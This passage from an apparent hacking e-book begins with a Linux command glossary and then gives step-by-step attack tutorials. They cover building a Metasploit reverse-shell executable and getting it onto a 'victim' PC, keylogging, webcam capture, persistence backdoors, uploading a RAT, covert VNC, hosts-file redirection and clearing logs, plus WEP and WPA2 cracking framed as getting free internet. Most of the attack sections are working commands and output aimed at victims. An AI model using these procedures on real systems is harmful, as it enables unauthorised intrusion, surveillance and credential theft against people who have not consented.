date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls'
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
dmesg Print kernel & driver messages
du Estimate file space usage
E
echo Display message on screen
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments
exec Execute a command
123
H
a
c
k
i
n
g

T
r
u
t
h

exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions
F
false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fg Send job to foreground
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros
fuser Identify/kill the process that is accessing a file
G
gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
124
H
a
c
k
i
n
g

T
r
u
t
h

groupadd Add a user security group
groupdel Delete a group
groupmod Modify a group
groups Print group names a user is in
gzip Compress or decompress named file(s)
H
hash Remember the full pathname of a name argument
head Output the first part of file(s)
help Display help for a built-in command
history Command History
hostname Print or set system name
I
iconv Convert the character set of a file
id Print user and group id's
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes
J
jobs List active jobs
join J oin lines on a common field
K
kill Stop a process from running
killall Kill processes by name
125
H
a
c
k
i
n
g

T
r
u
t
h

L
less Display output one screen at a time
let Perform arithmetic on shell variables
ln Create a symbolic link to a file
local Create variables
locate Find files
logname Print current login name
logout Exit a login shell
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files
M
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/J OLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
126
H
a
c
k
i
n
g

T
r
u
t
h

mtools Manipulate MS-DOS files
mtr Network diagnostics (traceroute/ping)
mv Move or rename files or directories
mmv Mass Move and rename (files)
N
netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
notify-send Send desktop notifications
nslookup Query Internet name servers interactively
O
open Open a file in its default application
op Operator access
P
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data
ps Process status
127
H
a
c
k
i
n
g

T
r
u
t
h

pushd Save and then change the current directory
pwd Print Working Directory
Q
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas
R
ram ram disk device
rcp Copy files between two machines
read Read a line from standard input
readarray Read from stdin into an array variable
readonly Mark variables/functions as readonly
reboot Reboot the system
rename Rename files
renice Alter priority of running processes
remsync Synchronize remote files via email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)
S
screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
128
H
a
c
k
i
n
g

T
r
u
t
h

select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.'
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
suspend Suspend execution of this shell
symlink Make a new name for a file
sync Synchronize data on disk with memory
T
tail Output the last part of file
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
129
H
a
c
k
i
n
g

T
r
u
t
h

times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command
U
ulimit Limit user resources
umask Users file creation mask
umount Unmount a device
unalias Remove an alias
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
uptime Show uptime
useradd Create new user account
userdel Delete a user account
usermod Modify user account
130
H
a
c
k
i
n
g

T
r
u
t
h

users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode
V
v Verbosely list directory contents (`ls -l -b')
vdir Verbosely list directory contents (`ls -l -b')
vi Text Editor
vmstat Report virtual memory statistics
W
wait Wait for a process to complete
watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Search the user's $path, man pages and source files for a program
which Search the user's $path for a program file
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')
wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user
X
xargs Execute utility, passing constructed argument list(s)
xdg-open Open a file or URL in the user's preferred application.
yes Print a string until interrupted
. Run a command script in the current shell
!! Run the last command again

131
H
a
c
k
i
n
g

T
r
u
t
h

EXPLOITING WINDOWS 7 REMOTE COMPUTER USING METASPLOIT
FRAMEWORK
Today Ill tell u how to exploit any remote machine of Windows 7.The steps are
as follows.First of all , start backtrack 5 and type startx to start the GUI mode:
root@bt:~#startx
The by default username and password is root and toor
(Skip first step if you are using kali linux)


To know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and
typing in:
root@bt:~#ifconfig












132
H
a
c
k
i
n
g

T
r
u
t
h

Launch msfconsole by going to Applications>>Backtrack>>Exploitation
Tools>>Network Exploitation Tools>>Metasploit Framework>>msfconsole
Or, just open a new terminal and type msfconsole and press enter to launch
Metasploit framework.

Wait a minute it takes some time to load msf

133
H
a
c
k
i
n
g

T
r
u
t
h

Lets now create an executable file which establishes a remote connection between
the victim and us, using the meterpreter payload.
Open another shell window (terminal) and type :
Cd P /opt/framework3/msf3


root@bt:/opt/framework3/msf3# ./msfpayload
windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=anyportno
x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select anything. You
will get like this:

Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

134
H
a
c
k
i
n
g

T
r
u
t
h

Now this is most important step that you should do!
However and whatever you do (by physically accessing the computer, or forcing victim
or by attracting victim or affecting the zips etc.) you must install that generated
executable to be executed on victims PC.

Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf >use exploit/multi/handler

135
H
a
c
k
i
n
g

T
r
u
t
h

msf exploit(handler) >set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =>windows/meterpreter/reverse_tcp
msf exploit(handler) >set LHOST xxx.xxx.xxx.xxx
LHOST =>xxx.xxx.xxx.xxx
msf exploit(handler) > set LPORT 4444
LPORT =>4444

all the connections are done. You have already made an executable file which makes
a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in exploit and press enter,
msf exploit(handler) >exploit

136
H
a
c
k
i
n
g

T
r
u
t
h

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter >ps
Search for explorer.exe and migrate to the process

meterpreter >migrate 2028
[*] Migrating to 2028
[*] Migration completed successfully.
meterpreter >


Type in the following:
meterpreter >use priv


137
H
a
c
k
i
n
g

T
r
u
t
h

Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victims computer,
J us type shell
meterpreter >shell
Process 844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>


You would now be having a command prompt,
Type in whoami, to see the computers name of victim:
C:\Windows\system32>whoami
whoami
kyrion-pc\kyrion
C:\Windows\system32




138
H
a
c
k
i
n
g

T
r
u
t
h

Lets say the victim has typed in anything on his computer.
J ust type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed key strokes:
meterpreter >keyscan_dump
Dumping captured keystrokes

ENJ OY!!! You just hacked remote computer
Here is a video tutorial of that..: http://adfoc.us/10187334395259












139
H
a
c
k
i
n
g

T
r
u
t
h

SOCIAL ENGINEERING TOOLKIT
What is Social engineering?
As the title says Social engineering; being socially engineered simply means
having trust of huge number of peoples thereby you will be able to use their trust to
get your work done!
In other words you can also say that its bad use of the trust you have! But
hackers do use this, very frequently they misuse the trust, and get benefitted, benefit
might be in any manner gaining your social password and username and using it
against money for social engineering like facebook likes which are now a days
even sold with a lot of curiosity!

But, this section of a penetration testing platform contains various attacks which
can be performed against the peoples. The attack are enlisted below:
Spear-Phishing Attack Vector
J ava Applet Attack Vector
Metasploit Browser Exploit Method
Credential Harvester Attack Method
Tabnabbing Attack Method
Man Left in the Middle Attack Method
Web J acking Attack Method
Multi-Attack Web Vector
Infectious Media Generator
Teensy USB HID Attack Vector
Website:http://www.social-
engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engi
neer_Toolkit_(SET)

A well maintained and fully updated official website by TrustedSec is always up for
you! So, Im not posting much about it here ;-) !




140
H
a
c
k
i
n
g

T
r
u
t
h

CRACK WI-FI PASSWORDS USING BACKTRACK OR KALI LINUX
Yes, Its possible to crack the wifi password using some tools, and you will be
able to use internet free of cost!
Things we need,
A Wi-Fi card which is compatible of Packet sniffing; this is the biggest
requirement. You'll need a wireless adapter that's capable of packet injection, and
chances are the one inbuilt in your computer is not.Grab a complete list of compatible
cards here: http://madwifi-project.org/wiki/Compatibility

A Backtrack or Kali installed or Live.
Note: This tutorial will not work if you use backtrack from VMware. You must
use a bootable pen drive with backtrack or a dedicated backtrack machine.
A WEP or WPA/WPA2 PSK secured wifi network in range.
Some patience with command line

CRACKING WEP PASSWORD

This post will also show you how one can easily crack WEP keys in no time.
Security Issues with WEP
WEP (Wired Equivalent Privacy) was proved full of flaws back in 2001, WEP protocol
itself has some weakness which allows the attackers to crack them in no time. The
biggest flaw probably in a WEP key is that it supports only 40bit encryption which
means that there are 16million possibilities only.

For more information on WEP flaws, kindly read the WEP flaws section here.
141
H
a
c
k
i
n
g

T
r
u
t
h

Requirements:-
Here is what you would require to crack a WEP key:

1. Backtrack or any other Linux distro with aircrack-ng installed

2. A Wifi adapter capable of injecting packets, For this tutorial I will use Alfa
AWUS036H which is a very popular card and it performs well with Backtrack

You can find compatible wifi card lists here.
Procedure:-
First Login to your Backtrack / Linux distro and plug in your Wifi adpter , Open a new
konsole and type in the following commands
ifconfig wlan0 up

Where wlan0 is the name of the wireless card, it can be different .To see all
wireless cards connected to your system simply type in " iwconfig " .

Putting your WiFi Adapter on Monitor Mode
To begin, youll need to first put your wireless adapter into monitor mode,
Monitor mode is the mode whereby your card can listen to every packet in the air ,
You can put your card into monitor mode by typing in the following commands
142
H
a
c
k
i
n
g

T
r
u
t
h


airmon-ng start (your interface)

Example:- airmon-ng start wlan0



Now a new interface mon0 will be created, You can see the new interface is in monitor
mode by entering "iwconfig mon0" as shown

143
H
a
c
k
i
n
g

T
r
u
t
h



Finding a suitable Target

After putting your card into monitor mode, we need to find a network that is protected
by WEP. You can discover the surrounding networks by entering the following
command

airodump-ng mon0



Bssid shows the mac address of the AP, CH shows the channel in which AP is
broadcasted and Essid shows the name broadcasted by the AP, Cipher shows
the encryption type.

Now look out for a wep protected network in my case ill take Linksys as my target
for rest of the tutorial
Attacking the Target
Now to crack the WEP key you'll have to capture the targets data into a file, to do this
we use airodump tool again, but with some additional switches to target a specific AP
and channel. Most importantly, you should restrict monitoring to a single channel to
speed up data collection, otherwise the wireless card has to alternate between all
channels .You can restrict the capture by giving in the following commands
144
H
a
c
k
i
n
g

T
r
u
t
h


airodump-ng mon0 --bssid -c (channel ) -w (file name to save )



As my target is broadcasted in channel 6 and has a bssid "98:fc:11:c9:14:22",I give in
the following commands and save the captured data as "RHAWEP"

airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP
Using Aireplay to Speed up the cracking
Now youll have to capture at least 20,000 data packets to crack WEP .This can be
done in two ways, The first one would be a (passive attack) wait for a client to connect
to the AP and then start capturing the data packets but this method is very slow, it can
take days or even weeks to capture that many data packets

The second method would be an (active attack)this method is fast and only takes
minutes to generate and inject that many packets .

In an active attack you'll have do a Fake authentication (connect) with the AP,then
you'll have to generate and inject packets. This can be done very easily by entering
the following commands
aireplay-ng - 1 3 -a (bssid of the target ) (interface)
145
H
a
c
k
i
n
g

T
r
u
t
h




In my case i enter the following commands aireplay-ng -1 3 -a 98:fc:11:c9:14:22
mon0
After doing a fake authentication, now its time to generate and inject Arp
packets . To this you'll have to open a new Konsole simultaneously and type in the
following commands aireplay-ng 3 -b (bssid of target) -h (Mac address of mon0)
(interface)
146
H
a
c
k
i
n
g

T
r
u
t
h




In my case I enter aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

If this step was successful you'll see Lot of data packets in the airodump capture as
shown



Wait till it reaches 20000 packets , best would be to wait till it reaches around 80,000
147
H
a
c
k
i
n
g

T
r
u
t
h

to 90,000 packets .Its simple more the packets less the time to crack .Once youve
captured enough number of packets, close all the process's by clicking the into mark
which is there on the terminal

Cracking WEP key using Aircrack

Now its time crack the WEP key from the captured data, Enter the following
commands in a new konsole to crack the WEP key.

aircrack-ng (name of the file ) In my case i enter aircrack-ng RHAWEP-0.1-cap With
in a few minutes Aircrak will crack the WEP key as shown



Once the crack is successful you will be left with the KEY! Remove the colons from
the output and youll have your WEP Key.





148
H
a
c
k
i
n
g

T
r
u
t
h

CRACKING WPA2-PSK ENCRYPTION
Cracking WPA/WPA2 is different from cracking a WEP password. The
WPA/WPA2 password is vulnerable to a dictionary brute force attack. In this tutorial i
will show you how to implement the brute force attack.
For this tutorial, I have used Backtrack 5 R3 and the Wi-Fi network is also setup by
me so I have full authorization of it.
Step 1: airmon-ng

The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]


Step 2:
airmon-ng start wlan0

Step 3 (Optional):
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4:
airodump-ng mon0

Then, press "Ctrl+c" to break the program.

149
H
a
c
k
i
n
g

T
r
u
t
h

Step 5:

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.

Step 6:
Open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.
Step 7:
Use the J ohn the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional):
If you do not want to use J ohn the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-
3.0.tgz/download
tar -xvzf crunch-3.0.tgz
150
H
a
c
k
i
n
g

T
r
u
t
h

cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv |
aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with
crunch.
Step a :
airmon-ng

The result will be something like:
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step b:
airmon-ng start wlan0
Step c (Optional):
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d:
151
H
a
c
k
i
n
g

T
r
u
t
h

airodump-ng mon0

Then, press " Ctrl+c" to break the program.
Step e:
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f:
Open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g:
If he following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h:
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-
3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
152
H
a
c
k
i
n
g

T
r
u
t
h

make install

Step i:
Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).
tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j:
/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --
all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step k (Optional) :
If you encounter error when reading the wpacrack-01.cap, you should do the following
step.
pyrit -r wpacrack-01.cap -o new.cap stripLive
153
H
a
c
k
i
n
g

T
r
u
t
h


/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --
all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step l:
Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks:
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is
about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not:
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system:
pyrit list_cores



154
H
a
c
k
i
n
g

T
r
u
t
h

METASPLOIT TUTORIAL BY SHAHAB IMAM
Metasploit is a tool used to exploit vulnerabilities in daemons running on an
open port. It is extremely powerful tool that is not easy to control. Many speak of
vulnerabilities without defining them first. So:
What is a vulnerability?
A vulnerability is a security hole in a piece of software, hardware or operating
system that provides a potential angle to attack the system. Not all vulnerabilities are
dangerous and not all of them are exploitable. They can be often found in outdated
applications, services or operating systems. Now that we understand what being
exploitable means, what is an exploit itself?
What are exploits?
Exploits are highly specialized small programs, whose only purpose is to take
advantage of a vulnerability and deliver a payload, which will grant attacker the
control. Metasploit is a great tool that has a vast number of exploits. I will cover using
some of them later on. So, if it's purpose is to deliver a payload, what is payload?
Buffer Overflow
Buffer Overflow is a common method used to make exploits. How does it work?
Imagine a glass of Water. You're thirsty and you want to drink it. You keep
pouring it into the glass, but at one point, the water will have filled the glass and it will
leak outside of it, on your carpet/floor. This is exactly what buffer overflow is. It
happens when a program or file writes data to a buffer and overflows it. It leaks into
adjacent memory and overrides it. That way we get our malicious part to execute.
What is a payload?
Payload is delivered by exploit and is used to control the remote system.Think
of it this way: Exploit is like terrorist that is carrying a bomb in his backpack. He enters
the system and leaves his backpack there. Most popular and widely known payload
is meterpreter, that has a lot of features. With it you can Browse remote files,
downlaod them, upload your own, capture keystrokes, take screenshots, open DOS,
and pivot to another machine as well. Through meterpreter, you can pivot and attack
machines in networks that are not your own.
The first step to success is a small one. You cant learn without studying. That's
why you have to get your hands dirty, and start the quest of searching. But before
that, let's just talk a little about Metasploit.
Metasploit
155
H
a
c
k
i
n
g

T
r
u
t
h

Metasploit and all of it's exploits are written in Ruby. Metasploit has four interfaces.
MsfCli
MsfConsole
MsfGui
Armitage
I will be going in detail about MsfConsole and Armitage. You can run metasploit
in both Windows and Linux.
Windows - 95% Aamong you out there use it .. -_-
Use BackTrack:- BackTrack is linux made entirely for Pentesting purposes. It has a
vast number of amazing tools that you will be using. Metasploit is one of them.
Information Gathering
Exploitation
Executable Payload
MeterPreter
DNS Spoofing
Sniffing
Armitage
Now We come to the First Part of Learning to use Metasploit Like a Pro:-
1. INFORMATION GATHERING: Well the Name "Information Gathering' suggests
the meaning of what is Information gathering. I need not necessarily explain anything
else furthermore. BUT for All those 'l33ts' i will explain it: Gathering Information about
a Specific Target is called Information gathering. Two of the Most WIDELY USED
TOOLS are:
1. Nmap
2. Nessus
We are briefly going to discuss these 2 HERE!!
Tool 1: Nmap
Nmap uses raw IP packets to determine if host is up or down, if he uses a firewall or
not, which ports are open, what services are running on the remote system and their
version. Nmap's GUI is called ZenMap. But we will not be using that today. Nmap is
built in feature of Metasploit, so you won't have to download anything. Open
Metasploit console and type: Nmap (IP Address) - (options that you want).
156
H
a
c
k
i
n
g

T
r
u
t
h

For e.g.:
nmap [Your IP Address here] -sV
[What is does is gives us the services that are running and their version. The more
outdated version the more exploitable the system is likely to be]
Take Notes of the service names:
search MSRPC
If you are lucky you can get an Exploit. If not move on to find another system. But
what if you do... If you get one go to exploit-db.com and type in the service name. If
lucky the search will return a exploit. Lets say I got a service name. i enter the service
name in the search and get a corresponding exploit match to that certain service id.
When you have the exploit, Use the 'Exploit' Command to "break into the system"...
But Assuming the target has a firewall installed in it we will use the
nmap [Your IP Address here] -sV -Pn command to scanned for open ports when
the firewall is turned on... and This is the End of the First part of Information gathering
using Nmap.









Tool 2: Nessus
Nessus is world's leading and most popular vulnerability scanner for a good reason.
It's awesome. It finds all vulnerabilities and makes the job much easier because you
can import nessus scan to metasploit. This will automatically find exploits that you
need. For that you need to create a database, which I will cover later in this tutorial.
Okay, so let's start! First we need to make an account.
Go here: http://adfoc.us/10187334395300 and Register
The code to activate Nessus will be sent to your email...
Go to Backtrack Console and type:
/opt/nessus/bin/nessus-fetch --register *Your code. Copy paste it from the
email*
Nessus will start fetching latest plugins. This might take a while so be patient. Next,
you want to create a new user. Do this by typing:
/opt/nessus/sbin/nessus-adduser
157
H
a
c
k
i
n
g

T
r
u
t
h

Now input your username and password. That's it. Now we need to start Nessus
itself. In console, type:
/etc/init.d/nessusd start
You have successfully installed Nessus on BackTrack.
Open Nessus interface by going to this address in your browser.
http://127.0.0.1:8834/
Input Username and Password and you're in. Nessus has some pretty cool features.
You can add your own Policies by clicking on Policies tab. There you can
enable/disable Nessus scan options.
Let's continue. Click scans and then hit add. Input scan name, Policy and Input
Address/es that you want to scan.
For local network scan choose network policy. For scanning over Internet choose
policy that will scan external IPs. After the scan is complete, click on it and then click
download report. Save it as .nbe This can be later used for automated exploitation.
Metasploit 2: Exploitation
Exploitation is main part of the whole process. Here is where you need to use
everything you have learned during the information gathering stage. Our main goal is
to exploit a system within our network and deliver a payload. So let's look at the
commands we will be using.
'Use' command is used to equip an exploit. You can imagine it as picking up a different
kind of weapon before getting ready for battle.
use (exploit name)
In the example above, exploit name is needed. So how do you know exploit name?
You get it during the information gathering stage. To view all exploits available, type
Show Exploits
After setting the exploit itself, you need to see which options it uses. They have to be
set manually. Some of them though do not need to be set. You can check if it is
required by looking under "Required" option. Type: [[ 'Show Options' ]]
Most exploits will require RHost and RPort. Browser based ones will Require
SRVHost and SRVPort. RHost is remote host. It is our target, IP address of the system
that we are attempting to exploit. RPort is set by default and should not be changed.
158
H
a
c
k
i
n
g

T
r
u
t
h

I will tell more about SRVHost and SRVPort when I talk about browser based exploits.
We need to set a payload that will be delivered. We do that by typing:
Set Payload (Payload name)
Payloads need LPort (Local Port) and LHost (Local Host). LPort has to be forwarded
to the attacker system if you want this to work on WAN. All payloads can be viewed
by Typing:
Show Payloads
Types of Payloads:
There are two types of Payloads. Reverse and Bind ones. Reverse payloads are left
on the attacker machine and they connect back to you, and thus connection is
reverse. On the attacker machine, there exists a listener, which accepts all incoming
connections. That's how you get your session. Reverse payloads are generally more
used then bind ones. Payloads can be made persistent by dumping them into registry.
For future sessions to be established, you will need to start the listener manually.
Bind payloads bind to the victim machine and through them attacker enters.
Connection is not reverse but direct.
Metasploit 3: Creating an Executable Payload
We can also make executable file and send it to remote machine. When they
run it, we will get meterpreter connection. This works like a RAT. We create our
executable payload which has our local IP, and port. When we send it to someone it
connects back to us. Let's start!
In backtrack, open a new console and type:
MSFpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.139
LPORT=8080 X > /root/Desktop/server.exe
This will create our server. When target runs it, it will try to connect back to us. So we
need to set up a listener. It will listen for incoming connections and accept them.
Start Metasploit console and type:
use exploit/multi/handler
Now lets add the payload. Type
Set Payload windows/meterpreter/reverse_tcp
set up the LPort and LHost
159
H
a
c
k
i
n
g

T
r
u
t
h

Set LHost 192.168.11.139
Set Lport 8080
And then type exploit. It will start listening for incoming connections. When slave runs
the file, meterpreter session will be created.
This can also be used outside LAN. When creating your executable in backtrack, use
your external IP as your LHOST. Forward the LPORT to your local IP and when you
set up a listener, set it to use your local IP, and not external one.
Some of you might still not know what port forwarding is, so let me explain. It's
forwarding all incoming connections on a certain port to local machine in your network.
Why is it necessary? When a connection comes through WAN to your router, the
router doesn't know where to send it. That's why you forward all connections. That
way the confusion isn't made and session gets established. Read more here. If you
still have no idea what I'm talking about, you should study networking before
proceeding.
We can inject our payload into formats other then .exe. Today we'll be using PDF file
format exploit. It injects payload in existing PDF file and when PDF file is opened it
executes the payload as a separate process thus leaving the legit one intact.
Open a new console and type msfconsole to start metasploit.
After that i am shoeing how to use other extensions rather than .exe type
use exploit/windows/fileformat/adobe_pdf_embedded_exe
we will see the options that we have so we type in "show options"
It you want to set INFILENAME, or in other words, the legit PDF document. J ust go
and download one. then use the command below to make it LEGIT.
set INFILENAME /root/Desktop/YOURFILE.pdf
Set the Payload to meterpreter and run the Exploit.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (LHOST)
exploit


160
H
a
c
k
i
n
g

T
r
u
t
h

Now we need to start a listener, so open a new console and type:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.104 (LHOST)
exploit
Now send the new, generated PDF to the victim and when he runs it you'll get your
meterpreter session.
Metasploit Series 4: Meterpreter
Meterpreter is a famous payload that is injected via the reflective DLL injection. It is
VERY powerful. It has a lot of commands that we will be looking at. Using meterpreter
session, you can even pivot through remote networks and exploit Systems inside
them as if you had direct access to it.
Use the ps To list active processes, and their PIDs.
If we injected the payload through browser, we need to move away from it. If browser
gets closed, we will lose our session as well. How do we do that? Migrate to another
process. Let's migrate to exploter.exe (Note: This is not internet explorer) Find the pid
of explorer.exe and then type migrate (pid) ... Now assuming that you have migrated
to explorer.exe process, we can assume that you are possibly safe, we can get a
screenshot of his desktoop or also spy on his webcam
screenshot (For screenshot of his desktop)
webcam_snap (For screenshot of his webcam)
Next, you can view files and change directories directly from meterpreter session by
using:
ls - Similar to 'Dir' in DOS
cd - to change directories
Del - delete
rmdir - remove directory
mkdir - make directory
NOTE: When you are browsing or doing anything with his drives make sure you use
double slashes \\ all the time.
161
H
a
c
k
i
n
g

T
r
u
t
h

Now let's try to get admin access by typing:
GetSystem
This will most likely fail on windows 7. There are three different techniques
meterpreter will try.
I said previously that meterpreter has Keylogger option. Let's test it. We have to
migrate to explorer process for this to work.
keyscan_start after waiting for a while ( for the command to be executed ) type
keyscan_dump it will dump any keystrokes recorded during that time....
Now let's make a backdoor so even when he shutdowns PC, we will continue getting
the session when he gets back on.
NOTE: You will have to start multi/handler to listen for connections
run persistence -U -I -P (lport) -R (LHost)
Defining the Commands:
-I : Interval for every attempt to connect, for example if we set it to 5 it will try to connect
every 5 seconds
-P : Lport
-R : LHost
Then we use the commands below:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (local IP)
set lport (port used)
exploit

Now that it is backdoor-ed, we will have access to it always. However, some of you
don't like all this typing and prefer GUI, so you can upload your RAT server.
upload C:\\YOURRAT.exe C:\\
This will upload our server called "RAT.exe" from our C:\ drive to his C:\ drive. NOTE:
If you don't have admin privs then upload it elsewhere, good place would be
162
H
a
c
k
i
n
g

T
r
u
t
h

C:\users\%username%. Now let's start DOS and run the file we uploaded using the [[
' Shell " ]] command, then navigate to where you uploaded the file then execute it, for
Eg.:
cd C:\
start YOURRAT.exe
You can also enable remote desktop on the victim, we can use the GETGUI
command, but there is one small problem, the victim will be notified whenever you try
to connect using the getgui, so instead i am use my personal favourite "VNC" open
up a new backtrack console and type in run vnc ,this enables us to control his desktop
at will without the tension of being caught as an Intruder...
we are also able to edit the Hosts file in Meterpreter (if you are a regular reader of this
page, by now you should know what are the hosts and what is their power in a system)
so to make this command successful we type in
run hostsedit -e *IP of site you want to redirect to*,*site that you want redirected*
And after that to delete the "evidence" that you performed this action we will use the
clearev command...
Now next we will see how to "snif" for passwords and usernames on various
